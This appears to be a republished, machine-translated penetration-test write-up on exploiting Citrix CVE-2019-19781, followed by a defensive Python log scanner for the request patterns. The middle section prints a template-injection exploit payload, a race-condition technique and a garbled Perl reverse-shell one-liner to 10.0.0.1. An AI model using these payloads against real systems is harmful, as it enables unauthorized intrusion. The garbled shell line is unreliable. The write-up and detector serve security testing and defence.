2025-01-19 Update From: SLTechnology News&Howtos (Network Security)
Shulou(Shulou.com)05/31 Report--
Many inexperienced people do not know how to go about compromising a Citrix device through the CVE-2019-19781 vulnerability. This article therefore summarizes the cause of the problem and how it was worked through in practice; I hope it helps you solve the same problem.
At the end of 2019, the high-risk Citrix vulnerability CVE-2019-19781 was disclosed. It affected more than 80,000 corporate network systems in more than 158 countries, exposing them to serious risks including directory traversal and remote code execution. If successfully exploited, an attacker can access the victim's internal network without authorization and achieve arbitrary code execution. Coincidentally, I ran into this vulnerability in a recent security assessment.
CVE-2019-19781 is also known as "Shitrix". Broadly speaking, the exploit relies on the template processing of the Citrix gateway application. Because the script /vpn/../vpns/portal/scripts/newbm.pl is invoked while a template is created, Perl template directives can be packed into a payload and written into an XML file under the templates directory. Since the payload is embedded in that XML, requesting that .xml file through /vpn/../vpns/portal/ triggers command execution.
There are now many public exploits for this vulnerability, some so simple that you give them a target IP, press Enter and get a reverse shell. However, in the real test environments I encountered, these public exploits did not work well, so let me describe what happened.
Vulnerability testing
First, I sent a GET request to the target device for /vpn/../vpns/cfg/smb.conf. It responded successfully, which shows that the device has the directory traversal vulnerability.
Next I tested for RCE, directly using the public bash command-line exploit for this vulnerability, but it failed:
I then used Burp to look at the individual requests. First, we send a POST request to /vpn/../vpns/portal/scripts/newbm.pl to generate an XML file containing the bookmark content. Directory traversal is used when invoking the newbm.pl script, and the NSC_USER header is used to choose where the XML is saved. Since the server responded with "Bookmark Added", this directory traversal plus bookmark write to test2.xml succeeded.
At this point I thought of two checks: test the write permissions on the /vpn/ directory, and test whether the target device has a blacklist or whitelist. For the first, my colleague @edhx0 suggested sending a request to rmbm.pl, which removes the bookmark content from the XML file but not the XML file itself. After sending the request to rmbm.pl, let's look at the bookmark content of test2.xml:
As you can see, rmbm.pl deleted the bookmark content, so through newbm.pl we do have write access. Furthermore, when I put the attack payload in the bookmark title parameter, the XML could not be generated, but when the title parameter was left blank the XML file was generated, which suggests that the target device has some kind of blacklist.
So now we can call the newbm.pl script with an empty title parameter, which successfully writes and generates the XML file; the RCE step then consists of accessing that XML file so that the code in it executes.
The bash version of the exploit uses the following payload:
[%25+template.new({'BLOCK'%3d'exec(\'$2 | tee /netscaler/portal/templates/$filenameid.xml\')%3b'})+%25]
When this payload is put in the title parameter, the response is at first the error "The requested page was not found on this server", but after repeatedly deleting special characters and retrying, a valid XML file is eventually returned. In the end I found that the string "BLOCK" was the only reason the payload did not succeed, so I tried encoding it in various ways and executing it through the Perl Template Toolkit, but whenever I requested the resulting XML file I got an error from the Perl runtime; decoded, the message is: "perl error - EVAL_PERL not set".
This was odd: the XML is writable and there is a Perl runtime, so had the XML file, or some of its characters, been deleted again? If so, could I use a race condition to access the XML before it is filtered? For example, I could send 50 concurrent requests for the XML file while also sending a bookmark creation request, hoping that one of the 50 requests hits the XML file and triggers the payload in it. In the payload shown in the figure below, I put a read of the configuration file ns.conf in the title parameter and write the result to test2.xml so that it is easy to run and display.
Next I used Burp Intruder to send the 50 concurrent requests, and some of them responded successfully, so the race condition was feasible!
The last thing to work out was a reverse shell. The target Citrix device did not have python or netcat installed, and the typical reverse-shell payloads need special characters such as >, & or double quotes, so those were out of the question. Following the Perl reverse shell construction method referenced here, I used the following construction:
Perl-e'tcp "10.0.0.1"; $perl-e'socket "; $if 1234tsocket (" tcp "); if (" open "," > & S "); open (STDOUT," > & S "); open (STDERR," > & S "); exec (" / bin/sh-I ");};';
I then converted the payload to an eval form built with chr() and made some further encoding substitutions, as follows:
Finally, the encoded payload can be inserted into the Perl template successfully; it is a little lengthy:
Fortunately, after using the race condition approach described above, I finally got a working reverse shell:
Follow up
Two days later, my colleague 0xedh told me that FireEye had published an article revealing that the NOTROBIN malware, after infecting a device through CVE-2019-19781, deletes XML files uploaded by other attackers that contain the string "BLOCK", giving it exclusive backdoor control of the Citrix device. So that was it! No wonder I ran into this behaviour: the Citrix test device had already been compromised by an attacker running NOTROBIN. The following shows the NOTROBIN backdoor process on the Citrix test device:
Vulnerability repair
Citrix users can refer to the mitigation measures officially released by Citrix. For red team testers who get "The requested page was not found on this server" when requesting the constructed XML file during an authorized test of a target Citrix application, consider the "directory traversal + race condition + file write + command execution" pattern (Path Traversal + Race Condition + File Write + Command Execution) to obtain a reverse shell. You also need to consider whether the target Citrix application has already been compromised by other attackers with NOTROBIN.
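For defenders, the request pattern described in this write-up (traversal from /vpn/ into /vpns/, the smb.conf probe, POSTs to newbm.pl, template directives in the title parameter, and the later fetch of the written .xml) is easy to pick out of web access logs. The following detection check is an added example, not code from the original article or from Citrix; the log lines are constructed samples and the log format is assumed to be Combined Log Format.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Combined Log Format style), not taken from a real device.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Jan/2020:10:01:02 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 512
10.0.0.5 - - [13/Jan/2020:10:01:05 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 87
10.0.0.5 - - [13/Jan/2020:10:01:06 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl?title=%5B%25+template.new HTTP/1.1" 200 87
10.0.0.5 - - [13/Jan/2020:10:01:09 +0000] "GET /vpn/../vpns/portal/test2.xml HTTP/1.1" 404 0
192.0.2.7 - - [13/Jan/2020:10:02:00 +0000] "GET /vpn/index.html HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)'
)


def classify_request(method, raw_path):
    """Return the list of CVE-2019-19781 indicators seen in one request (empty list = clean)."""
    # Decode twice: traversal sequences in exploit traffic are often URL-encoded more than once.
    path = unquote(unquote(raw_path))
    url, _, query = path.partition("?")
    findings = []
    if "/../" in url and "/vpns/" in url:
        findings.append("path traversal into /vpns/")       # the core of the vulnerability
    if url.endswith("/vpns/cfg/smb.conf"):
        findings.append("smb.conf read (traversal probe)")   # the first check used in the write-up
    if method == "POST" and url.endswith("/vpns/portal/scripts/newbm.pl"):
        findings.append("newbm.pl bookmark write")           # writes a .xml template to disk
    if "/vpns/portal/" in url and url.endswith(".xml"):
        findings.append("fetch of written template .xml")    # the request that triggers execution
    if "[%" in query or "template.new" in query:
        findings.append("Perl Template Toolkit directive in parameters")
    return findings


def scan_log(text):
    """Parse the log and return {client_ip: [findings...]} for clients showing any indicator."""
    hits = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        found = classify_request(m["method"], m["path"])
        if found:
            hits.setdefault(m["ip"], []).extend(found)
    return hits


if __name__ == "__main__":
    for ip, found in scan_log(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(found))
```

A 404 on the .xml fetch after a successful newbm.pl write, as in the sample, is the same symptom the write-up attributes to NOTROBIN removing the file, so that sequence is worth a second look on its own.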